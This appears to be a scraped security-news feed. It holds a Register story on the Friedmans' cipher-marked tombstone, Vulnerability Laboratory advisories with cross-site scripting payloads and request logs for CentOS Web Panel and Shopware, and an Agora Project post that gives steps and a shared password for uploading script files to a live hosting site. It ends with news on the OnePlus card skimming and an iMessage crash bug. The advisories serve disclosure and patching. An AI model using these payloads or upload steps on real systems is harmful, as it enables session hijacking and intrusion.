Unlocked: The hidden love note on the grave of America’s first crypto power-couple

Unlocked: The hidden love note on the grave of America’s first crypto power-couple • The Register

Unlocked: The hidden love note on the grave of America’s first crypto power-couple

BAAAB AABBB AAAAA BAAAA AABAA ABBAB ABBAA BAAAA AABAA AAABB AAABB ABAAA BAABA

Shmoocon Among the 400,000 graves at the Arlington National Cemetery – a solemn US military graveyard in Virginia – lies the final resting place of cryptography pioneers William and Elizebeth Friedman.

And hidden in code on their tombstone is a touching tribute from a wife to her husband. A code that’s only now just been cracked, decades after it was engraved in the cool stone.

William, born 1891, and Elizebeth, born a year later, married in 1917.

Among many cryptological feats, the couple trained America’s first cadre of code-breakers after developing an interest in cryptography while examining the so-called Baconian cipher – developed by the British Elizabethan cryptographer Sir Francis Bacon.

William invented the term cryptanalysis, and pretty much broke the key Japanese World War II cipher Purple – so named because transcripts were kept in purple folders.

Meanwhile, Elizebeth was America’s first woman cryptanalyst, and encouraged her husband to pursue cryptography. She also worked with the US government to break the communication codes of rum runners during the prohibition era, and helped crack Germany’s Enigma machine ciphers during World War II.

In 1969, at the age of 78, William died, and was buried at Arlington. His wife designed his gravestone, consisting of a pair of crossed flags – the symbol of William’s military signals unit – and one of his favorite phrases, “Knowledge is power,” a quote attributed to Sir Francis.

The same phrase appeared in code in the graduation photograph of the 1918 code-breakers class the Friedmans taught, in which some of the students faced sideways and others look straight at the camera. The direction of their faces spelled out a phrase using the Baconian cipher.

classpic

Smart … Part of the crypto-class graduation photo in 1918

Sir Francis came up with a code whereby every letter in the alphabet could be represented by a group of five ‘a’ or ‘b’ letters. For example, N is ‘abbaa’, and O is ‘abbab’. In the class photo, by converting the direction of each person’s face – ahead or to the side – as an ‘a’ or ‘b’, and running it through the cipher, the class lineup spelled out.. KNOWLEDGE IS POWER.

Shortly after moving to Washington DC, cryptographer Elonka Dunin paid a visit to the Friedmans’ grave. Elizebeth was buried alongside her husband after her death in 1980, and her name was added to the tombstone. Dunin noticed something odd. The phrase “Knowledge is Power” chiseled into the stone using a mix of serif and sans-serif letter designs.

If you assume the serif letters represent a ‘b’, and the san-serif characters are each an ‘a’, the phrase can be converted into ‘babaa aabab aabab’, if you discount the final letter r.

Running that sequence through the Baconian cipher spells out WFF, William’s initials. Dunin told this year’s Shmoocon computer security conference in Washington DC on Friday that she believes this is a hidden note to William from his wife when she designed his gravestone.

KIP

Encoded … ‘Knowledge is power’ written on the couple’s tombstone

The pair had a reputation for this sort of thing. They wrote a book together in 1957 called The Shakespearean Ciphers Examined, which thoroughly debunked the theory that Sir Francis wrote many of the Bard’s plays and left coded clues in his manuscripts.

On page 257 of the book, in the bottom paragraph, the authors bolded up certain letters and left other untouched. When translated using the Bacon’s cipher, the message read: “I did not write the plays, F Bacon.”

note

Confirmation … A note planning the grave’s design

The final confirmation of Dunin’s theory about the tombstone came after an examination of the Friedman papers in the Marshall Library, where a note by Elizebeth was found indicating how the WFF message was generated – by breaking up “Knowledge is Power” into three letters using Sir Francis’ algorithm.

All like all mortals, cryptographers die – but their hidden notes live on unbroken for decades, if not forever. ®

Sponsored: Minds Mastering Machines – Call for papers now open

https://www.theregister.co.uk/2018/01/20/friedman_cryptographic_grave_message/

CentOS Web Panel 0.9.8.12 Cross Site Scripting

Document Title:
===============
CentOS Web Panel v0.9.8.12 – Non-Persistent Cross Site Scripting Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1835

Release Date:
=============
2018-01-17

Vulnerability Laboratory ID (VL-ID):
====================================
1835

Common Vulnerability Scoring System:
====================================
3.3

Vulnerability Class:
====================
Cross Site Scripting – Non Persistent

Current Estimated Price:
========================
500a! – 1.000a!

Product & Service Introduction:
===============================
CentOS Web Panel – Free Web Hosting control panel is designed for quick and easy management of (Dedicated & VPS) servers without of
need to use ssh console for every little thing. There is lot’s of options and features for server management in this control panel.
CWP automatically installs full LAMP on your server (apache,php, phpmyadmin, webmail, mailservera|).

(Copy of the Homepage: http://centos-webpanel.com/features )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a client-side cross site scripting vulnerability in the CentOS Web Panel v0.9.8.12.

Vulnerability Disclosure Timeline:
==================================
2018-01-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
CWP
Product: CentOS Web Panel – (CWP) 0.9.8.12

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official CentOS Web Panel v0.9.8.12.
The vulnerability allows remote attackers to inject script code to the client-side browser to application requests.

The client-side cross site web vulnerability is located in the `module` value of the `index.php` file GET method request.
The vulnerability can be exploited by remote attackers with a prepared malicious link to the centos web-panel application.
The request method to inject is GET and the attack vector is non-persistent. The injection point is the module parameter
and the execution point occurs in the module exception.

The security risk of the web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.
Exploitation of the non-persisten vulnerability requires no privileged web-application user account and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] index.php

Vulnerable Parameter(s):
[+] module

Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote attackers without privileged web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Dork(s):
“powered by CentOS-WebPanel.com”

PoC: Payload(s)
http://localhost:2030/index.php?module=clam%3E%22%3Ciframe%20src=evil.source%20onload=alert%28document.cookie%29%20%3C
http://localhost:2030/index.php?module=clam

PoC: Exception-Handling
<div class=”row”>
The module clam>”<[CLIENT SIDE SCRIPT CODE PAYLOAD EXECUTION!]> does not exist.
</div><!– End .row –>
</div><!– End contentwrapper –>
</div><!– End #content –>
</div><!– End #wrapper –>

— PoC Session Logs [POST] —
Status: 200[OK]
GET http://localhost:2030/index.php?module=clam%3E%22%3Ciframesrc=evil.source%20onload=alert(document.cookie)%20%3C
Mime Type[text/html]
Request Header:
Host[localhost:2030]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Cookie[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; PHPSESSID=8dsrha0ivd80kkgukvklgvmct1]
Connection[keep-alive]
Response Header:
Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
X-Powered-By[PHP/5.4.27]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]

Reference(s):
http://localhost:2030/
http://localhost:2030/index.php
http://localhost:2030/index.php?module

Solution – Fix & Patch:
=======================
The vulnerability can be patched by a sanitize of the vulnerable module parameters in the `index.php` file GET method request.
Disallow special chars and restrict the parameter input to prevent further client-side script code injection attacks.
Escape the output content of the error exception for invalid inputs to prevent the execution point of the client-side vulnerability.

Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the centos web panel is estimated as medium (CVSS 3.3).

Credits & Authors:
==================
Benjamn Kunz Mejri (Vulnerability Laboratory) – https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

Domains: www.vulnerability-lab.com – www.vulnerability-db.com – www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php – vulnerability-lab.com/list-of-bug-bounty-programs.php – vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php – vulnerability-lab.com/rss/rss_upcoming.php – vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab – facebook.com/VulnerabilityLab – youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact ([email protected]) to get an ask permission.

Copyright A(c) 2018 | Vulnerability Laboratory – [Evolution Security GmbH]aC/


VULNERABILITY LABORATORY – RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Shopware 5.2.5 / 5.3 Cross Site Scripting

Document Title:
===============
Shopware 5.2.5 & v5.3 – Multiple Cross Site Scripting Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1922

Shopware Security Tracking ID: SW-19834

Security Update:
http://community.shopware.com/Downloads_cat_448.html#5.3.4
http://community.shopware.com/_detail_2035.html

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15374

CVE-ID:
=======
CVE-2017-15374

Release Date:
=============
2017-09-05

Vulnerability Laboratory ID (VL-ID):
====================================
1922

Common Vulnerability Scoring System:
====================================
4.4

Vulnerability Class:
====================
Cross Site Scripting – Persistent

Current Estimated Price:
========================
1.000a! – 2.000a!

Product & Service Introduction:
===============================
Shopware is a modular online shop system that is since 2004 developed in germany. It is available both as
an open source software as well as in commercial editions. The program can be extended in its functions by
installing additional plugins. An open API allows third-party systems, such as payment services or ERP
systems, to be connected. The system is multi shop capable it can thus be generated within an installation
several shops in different domains. A multi-client capability (complete separation of multishops in the
administration area) is by default, but can be achieved in the cluster.

(Copy of the Vendor Homepage: https://en.shopware.com/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple stored cross site scripting vulnerability in the official Shopware v5.2.5 & 5.3 CMS.

Vulnerability Disclosure Timeline:
==================================
2016-10-07: Researcher Notification & Coordination (Benjamin Kunz Mejri – Evolution Security GmbH)
2016-10-08: Vendor Notification (Shopware Security Team)
2016-**-**: Vendor Response/Feedback (Shopware Security Team)
2017-**-**: Vendor Fix/Patch (Shopware Service Developer Team)
2017-09-05: Public Disclosure (Vulnerability Laboratory)
2017-10-25: Security Acknowledgements (Shopware Developer Team)
2017-10-25: Security Acknowledgements (Shopware Security Team)

Discovery Status:
=================
Published

Affected Product(s):
====================
Shopware AG
Product: Shopware – Content Management System (Web-Application) 5.2.5

Shopware AG
Product: Shopware – Content Management System (Web-Application) 5.3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
The shopware v5.2.5 – v5.3 is vulnerable to cross site scripting in the customer and order section of the content management
system backend modules. Remote attackers are able to inject malicious script code to the firstname, lastname or order
input fields to provoke a persistent execution in the customer and orders section of the backend. The execution occurs
in the shopware administrator backend listing when processing to preview the customers (kunden) or orders (bestellungen).
The injection can be processed by interaction via user registration or by manipulation of the order information inputs.
The web issue can be exploited by low privileged user accounts against higher privileged admin- oder moderator-accounts.

The security risk of the bugs are estimated as medium with a cvss (common vulnerability scoring system) count of 4.4.
Exploitation of the issue requires a low privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent
external redirect to malicious sources and application-side manipulation of affected or connected module context.

Request Method(s):
[+] POST (Registration)
[+] POST (Order Item)
[+] POST (Profile Update)

Vulnerable Input(s):
[+] Firstname
[+] Lastname
[+] Order Name

Affected Module(s):
[+] Kunden (Customers)
[+] Bestellungen (Orders)

Proof of Concept (PoC):
=======================
The cross site vulnerabilities can be exploited by remote attackers with low privileged shopware user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability …
1. Open the the browser and surf to the target shopware v5.2.5 web-application
2. Move to the registration formular
3. Include a script code payload with a iframe src onload tag to the firstname, lastname and name parameters
4. Submit the request via POST method to register the account
5. Move to the inbox and verify via link the account to activate
Note: Now the payloads are executable saved to the Kunden (Customer) section in the backend
6. The administrator visits in the next step the Kunden (Customer) section to preview
7. The script code payload executes in the customers list
8. As next step the attacker places an order via shop
Note: The order name manipulation via registration is as well able to execute script code the context
9. The administrator visits in the next step the Bestellungen (orders) section to preview
10. The script code payload executes in the orders list
11. Successful reproduce of the both cross site vulnerabilities!

Note: Attackers are able to inject malicious redirects, frames with payloads or other script code tags.
The basic web validation filter of the shopware content management system does not encode the list context.

PoC: Vulnerable Source (Execution in Orders – Bestellungen)
<tr class=”x-grid-row x-grid-row-alt”><td class=” x-grid-cell x-grid-cell-gridcolumn-1496
x-grid-cell-special x-grid-cell-row-checker x-grid-cell-first”><div class=”x-grid-cell-inner ”
style=”text-align: left; ;”><div class=”x-grid-row-checker”>&nbsp;</div></div></td><td class=”
x-grid-cell x-grid-cell-gridcolumn-1428 “><div class=”x-grid-cell-inner ” style=”text-align: left;
;”>20.08.2016 08:34</div></td><td class=” x-grid-cell x-grid-cell-gridcolumn-1429
“><div class=”x-grid-cell-inner ” style=”text-align: left; ;”>20044</div></td><td class=”
x-grid-cell x-grid-cell-gridcolumn-1430 “><div class=”x-grid-cell-inner ” style=”text-align: left; ;”>
536,80</div></td><td class=” x-grid-cell x-grid-cell-gridcolumn-1431 “><div class=”x-grid-cell-inner ”
style=”text-align: left; ;”>&nbsp;</div></td><td class=” x-grid-cell x-grid-cell-gridcolumn-1432 “>
<div class=”x-grid-cell-inner ” style=”text-align: left; ;”>Rechnung</div></td><td class=” x-grid-cell
x-grid-cell-gridcolumn-1433 “><div class=”x-grid-cell-inner ” style=”text-align: left; ;”>Standard Versand</div></td>
<td class=” x-grid-cell x-grid-cell-gridcolumn-1434 “><div class=”x-grid-cell-inner ” style=”text-align: left; ;”>
Hauptshop Deutsch</div></td><td class=” x-grid-cell x-grid-cell-gridcolumn-1435 “><div class=”x-grid-cell-inner ”
style=”text-align: left; ;”>Mar’Da>”<iframe src=”evil.source” onload=”alert(“PTEST”)[PERSISTENT SCRIPT CODE EXECUTION!]” <=””
korat=””>”<iframe src=evil.source onload=alert(“PTEST”)[PERSISTENT SCRIPT CODE EXECUTION!] <</div></td><td class=” x-grid-cell
x-grid-cell-gridcolumn-1436 ” ><div class=”x-grid-cell-inner ” style=”text-align: left; ;”><a href=”mailto:[email protected]
data-qtip=”[email protected]”>[email protected]</a></div></td><td class=” x-grid-cell x-grid-cell-gridcolumn-1437
” ><div class=”x-grid-cell-inner ” style=”text-align: left; ;”>Offen</div></td><td class=” x-grid-cell
x-grid-cell-gridcolumn-1438 ” ><div class=”x-grid-cell-inner ” style=”text-align: left; ;”>Offen</div></td>
<td class=” x-grid-cell x-grid-cell-actioncolumn-1405 x-action-col-cell x-grid-cell-last” >
<div class=”x-grid-cell-inner ” style=”text-align: left; ;”>
<img alt=”” src=”data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==”
class=”x-action-col-icon x-action-col-0 sprite-user ” data-qtip=”Kunde APffnen” data-action=”openCustomer” />
<img alt=”” src=”data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==”
class=”x-action-col-icon x-action-col-1 sprite-minus-circle-frame ” data-qtip=”Bestellung lAPschen”
data-action=”deleteOrder” /><img alt=”” src=”data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==”
class=”x-action-col-icon x-action-col-2 sprite-pencil ” data-qtip=”Zeige Details” data-action=”editOrder” /></div></td></tr>
<tr class=”x-grid-row ” ><td class=” x-grid-cell x-grid-cell-gridcolumn-1496 x-grid-cell-special
x-grid-cell-row-checker x-grid-cell-first” ><div class=”x-grid-cell-inner ” style=”text-align: left; ;”>
<div class=”x-grid-row-checker”> </div></div></td><td class=” x-grid-cell x-grid-cell-gridcolumn-1428 ” >
<div class=”x-grid-cell-inner ” style=”text-align: left; ;”>19.08.2016 15:50</div></td><td class=” x-grid-cell
x-grid-cell-gridcolumn-1429 ” ><div class=”x-grid-cell-inner ” style=”text-align: left; ;”>20051</div></td>
<td class=” x-grid-cell x-grid-cell-gridcolumn-1430 ” ><div class=”x-grid-cell-inner ”
style=”text-align: left; ;”>308,75</div></td><td class=” x-grid-cell x-grid-cell-gridcolumn-1431 ” >
<div class=”x-grid-cell-inner ” style=”text-align: left; ;”> </div></td>

PoC: Vulnerable Source (Execution in Customers – Kunden)
<div class=”x-window x-customer-detail-window x-layer x-window-default x-closable x-window-closable x-window-default-closable”
style=”left: 124px; top: 26px; width: 1093px; height: 458px; z-index: 39041;” id=”customer-detail-window-2311″ tabindex=”-1″>
<div style=”-moz-user-select: none; left: -1px; top: -1px; width: 1093px;” class=”x-window-header x-window-header-draggable
x-docked x-window-header-default x-horizontal x-window-header-horizontal x-window-header-default-horizontal x-top
x-window-header-top x-window-header-default-top x-docked-top x-window-header-docked-top x-window-header-default-docked-top
x-unselectable” id=”customer-detail-window-2311_header”><div style=”width: 1091px;” id=”customer-detail-window-2311_header-body”
class=”x-window-header-body x-window-header-body-default x-window-header-body-horizontal x-window-header-body-default-horizontal
x-window-header-body-top x-window-header-body-default-top x-window-header-body-docked-top x-window-header-body-default-docked-top
x-window-header-body-default-horizontal x-window-header-body-default-top x-window-header-body-default-docked-top x-box-layout-ct”>
<div style=”width: 1066px; height: 154px;” id=”customer-detail-window-2311_header-innerCt” class=”x-box-inner ”
role=”presentation”><div id=”customer-detail-window-2311_header-targetEl” style=”position:absolute;width:20000px;
left:0px;top:0px;height:1px”><div class=”x-component x-window-header-text-container x-box-item x-component-default”
style=”text-align: left; left: 0px; top: 0px; margin: 0px; width: 1049px;” id=”customer-detail-window-2311_header_hd”>
<span id=”customer-detail-window-2311_header_hd-textEl” class=”x-window-header-text x-window-header-text-default”>
Kundenkonto: Mar’Da”><iframe src=”evil.source” onload=”alert(“PTEST”)[PERSISTENT SCRIPT CODE EXECUTION!]” <=””
korat”=””><iframe src=evil.source onload=alert(“PTEST”)[PERSISTENT SCRIPT CODE EXECUTION!] < (20019)</iframe></span></div>
<div class=”x-tool x-box-item x-tool-default” style=”width: 15px; height: 15px; left: 1051px; top: 70px; margin: 0px;” id=”tool-2312″>
<img id=”tool-2312-toolEl” src=”data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==”
class=”x-tool-close” role=”presentation”></div></div></div></div>

— PoC Session Logs [POST] —
Status: 200[OK]
POST http://shopware.localhost:8080/backend/customer/save?_dc=1471541475086&customerID=22
Mime Type[application/json]
Request Header:
Host[shopware.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Content-Type[application/json]
X-Requested-With[XMLHttpRequest]
Referer[http://shopware.localhost:8080/backend/]
Cookie[SHOPWAREBACKEND=fv4u2kg63p3ff3ht6kd6var803; test; x-ua-device=desktop; session-1=e7f8815a87d6cfa5552abf58325ca4fa184f7b69f9d45ff7b101c17f7ee0a255;]
Connection[keep-alive]
POST-Daten:
{“id”:22,”groupKey”:”EK”,”email”:”[email protected]”,”active”:true,”accountMode”:0,”confirmationKey”:
“”,”paymentId”:5,”firstLogin”:”2016-08-18T00:00:00″,”lastLogin”:”2016-08-18T17:22:23″,”newsletter”:0,”validation”:0,”
languageId”:1,”shopId”:1,”priceGroupId”:0,
“internalComment”:”TEST-comment”,”failedLogins”:0,”referer”:””,”default_billing_address_id”:22,”
default_shipping_address_id”:22,
“newPassword”:””,”amount”:402.9,”orderCount”:1,”canceledOrderAmount”: 0,”shopName”:”Hauptshop Deutsch”,”language”:”Deutsch”,”birthday”:”16.05.1985″,”title”:””,”
salutation”:”mr”,”firstname”:”TEST[INJECTED SCRIPT CODE]>”<iframe src=./evi.source onload=alert(document.cookie) <“,”
lastname”:”TEST[INJECTED SCRIPT CODE]>”<iframe src=./evi.source onload=alert(document.cookie) <“,
“number”:”20028″,”billing”:[{“id”:22,”salutation”:”mr”,”company”:””,”
department”:””,”firstName”:”TEST[INJECTED SCRIPT CODE]>”<iframe src=./evi.source onload=alert
(document.cookie) <“,”title”:””,”lastName”:”TEST[INJECTED SCRIPT CODE]>”<iframe src=./evi.source onload=alert(document.cookie) <“,
“street”:”Teststrau00dfe”,”zipCode”:”72202″,”city”:”Nagold”,”additionalAddressLine1″:””,”additionalAddressLine2″:””,
“salutationSnippet”:”Herr”,”countryId”:2,”number”:””,”phone”:””,”vat
Id”:””,”stateId”:null}],”shipping”:[{“id”:23,”salutation”:”mr”,”company”:””,”department”:””,
“firstName”:”TEST[INJECTED SCRIPT CODE]>”<iframe src=./evi.source
onload=alert(document.cookie) <“,”title”:””,
“lastName”:”TEST[INJECTED SCRIPT CODE]>”<iframe src=./evi.source onload=alert(document.cookie) <“,
“street”:”Teststrau00dfe”,”zipCode”:”72202″,”city”:”Nagold”,”additionalAddressLine1″:””,
“additionalAddressLine2″:””,”salutationSnippet”:”Herr”,”countryId”:2,”stateId”:null}],”debit”:
[],”paymentData”:[{“accountNumber”:””,”bankCode”:””,”bankName”:””,”accountHolder”:””,”bic”:””,
“iban”:””,”useBillingData”:false,”id”:null}]}]
Response Header:
Server[nginx/1.8.1]
Content-Type[application/json]
Connection[keep-alive]
Set-Cookie[SHOPWAREBACKEND=88g31dgs8lem6cun3ldjq4l3f2; path=/backend/; HttpOnly]

Status: 200[OK]
POST http://shopware.localhost:8080/backend/Log/createLog
Mime Type
[application/json]
Request Header:
Host[shopware.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://shopware.localhost:8080/backend/]
Cookie[SHOPWAREBACKEND=88g31dgs8lem6cun3ldjq4l3f2; test; x-ua-device=desktop;
session-1=e7f8815a87d6cfa5552abf58325ca4fa184f7b69f9d45ff7b101c17f7ee0a255;]
Connection[keep-alive]
POST-Daten:
type[backend]
key[Kunden]
text[Kunde%2020028%20wurde%20gespeichert]
user[Demo-Admin]
value4[]
Response Header:
Server[nginx/1.8.1]
Content-Type[application/json]
Connection[keep-alive]
Set-Cookie[SHOPWAREBACKEND=hmb3lqokn3bkr6kvpo1o6vi4o6; path=/backend/; HttpOnly]

Status: 200[OK]
GET http://shopware.localhost:8080/backend/evil.source[PERSISTENT SCRIPT CODE EXECUTE!]
Mime Type[text/html]
Request Header:
Host[shopware.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Referer[http://shopware.localhost:8080/backend/]
Cookie[SHOPWAREBACKEND=p56ursgfdc6f1tbh0s35detvc5; test; x-ua-device=desktop;
session-1=e7f8815a87d6cfa5552abf58325ca4fa184f7b69f9d45ff7b101c17f7ee0a255;]
Connection[keep-alive]
Response Header:
Server[nginx/1.8.1]
Content-Type[text/html; charset=UTF-8]
Connection[keep-alive]
Set-Cookie[SHOPWAREBACKEND=v3mhes99ai1hsolj8vddjkbci2; path=/backend/; HttpOnly]

Reference(s):
http://shopware.localhost:8080/
http://shopware.localhost:8080/backend/
http://shopware.localhost:8080/backend/Log/
http://shopware.localhost:8080/backend/customer/
http://shopware.localhost:8080/backend/Log/createLog
http://shopware.localhost:8080/backend/customer/save
http://shopware.localhost:8080/backend/AttributeData/
http://shopware.localhost:8080/backend/AttributeData/list

Solution – Fix & Patch:
=======================
The xss vulnerability can be patched by a secure parse of the customer (kunden) and orders (bestellungen) context listings.
Parse or escape the context and disallow special chars during the registration or add to prevent further script code injection attacks.

The vulnerability can be resolved by an update to version 5.3.4 that is delivered by the manufacturer. The issue risk is marked as moderate.

Security Risk:
==============
The security risk of the stored cross site scripting vulnerabilities in the shopware cms are estimated as medium. (CVSS 4.4)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] – Benjamin Kunz Mejri [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

Domains: www.vulnerability-lab.com – www.vulnerability-db.com – www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php – vulnerability-lab.com/list-of-bug-bounty-programs.php – vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php – vulnerability-lab.com/rss/rss_upcoming.php – vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab – facebook.com/VulnerabilityLab – youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact ([email protected]) to get an ask permission.

Copyright A(c) 2018 | Vulnerability Laboratory – [Evolution Security GmbH]aC/


VULNERABILITY LABORATORY – RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Agora Project 3.3.5 Cross Site Scripting

============================================================================================================================
| # Title : Agora project 3.3.5 XSS File upload Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 Fr V.(Pro) |
| # Vendor : https://www.agora-project.net/?ctrl=offline&action=download |
| # Dork : n/a |
============================================================================================================================

poc :

[+] go to https://www.omnispace.fr/AP-OMNISPACE/index.php?ctrl=omnispace&action=recordCommand

[+] Register a new user space and follow steps

[+] login in your space or use mine space : https://www.omnispace.fr/indoushka/ user : [email protected] & pass :112233az

[+] file manager https://www.omnispace.fr/indoushka/?ctrl=file

[+] choose your file html or svg and upload it

[+] here you can found your files

https://www.omnispace.fr/indoushka/HEBERGEMENT/STOCK_FICHIERS/indoushka/modFile/

Greetz :—————————————————————————————-
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko ‘LiquidWorm’ Krstic |
|
================================================================================================

OnePlus Confirms Credit Card Breach Impacted Up to 40,000 Customers

OnePlus has confirmed that up to 40,000 customers have been affected by a credit card breach, in the latest embarrassing misstep for the Chinese handset maker.

The news comes several days after OnePlus shut down credit card processing following complaints from customers about fraudulent charges landing on their cards after they bought products through OnePlus’s online store.

OnePlus offered an explanation of what had happened on its website.

“One of our systems was attacked, and a malicious script was injected into the payment page code to sniff out credit card info while it was being entered,” the company said. “The malicious script operated intermittently, capturing and sending data directly from the user’s browser. It has since been eliminated. We have quarantined the infected server and reinforced all relevant system structures.”

The affected users entered their card information on OnePlus’s store between mid-November and January. Customers who made purchases with a saved card “should not” be affected, OnePlus said. The same goes for ones who paid with PayPal or credit card via PayPal. Affected users will be offered a year of credit monitoring.

“We cannot apologize enough for letting something like this happen,” the company said. “We are eternally grateful to have such a vigilant and informed community, and it pains us to let you down.”

OnePlus’s investigation is continuing and it is working with local law enforcement. Perhaps more importantly to current and prospective customers, it is conducting a security audit and “working to implement a more secure credit card payment method.”

Some customers expressed unhappiness and concern over the data breach on Twitter.

OnePlus’s devices have often been dubbed “iPhone killers” for their combination of looks, functionality and price.

Credit card breaches are an unfortunate fact of modern life, but OnePlus was already riding a regularly cresting wave of bad publicity that has clashed with its devices’ popularity.

In November, a security researcher revealed that OnePlus had left a debugging tool on its phones that could give attackers root access to the devices. Security researcher Christopher Moore found in October that OnePlus was collecting large amounts of personally identifiable usage data without user consent. And in July, a software bug in the OnePlus 5 rebooted the phone when users made an emergency call.

Apple Preps ChaiOS iMessage Bug Fix for Next Week

UPDATE

The so-called ChaiOS message bug identified this week in Apple iOS devices will receive a fix with the rollout of the update for iOS 11.2.5, expected next week.

The update will address a flaw software developer Abraham Masri publicly identified in a tweet earlier this week, according to multiple published reports. The flaw causes the iMessage app on iOS devices to freeze, crash or restart.

Macs are also affected. A macOS High Sierra 10.13.3 update is expected later this month to fix the flaw.

Apple confirmed to Threatpost an iOS software fix would be available next week. Apple didn’t divulge specifics on the fix, however news site WCCFTECH  and others confirm that iOS 11.2.5 Beta 6, released late Wednesday, fixes the bug.

The ChaiOS message bug, also called a “text bomb” flaw, made headlines Tuesday when Masri posted a hyperlink to code on his GitHub repository that activated the flaw. Recipients receiving messages via the iMessage app containing the link to the malicious code hosted on GitHub reported devices freezing and in some cases crashing. Recipients only needed to receive the malicious messages for the flaw to work, clicking on the link wasn’t required.

Meanwhile, Mac users reported the bug made their Safari browser crash or causes systems to slowdown.

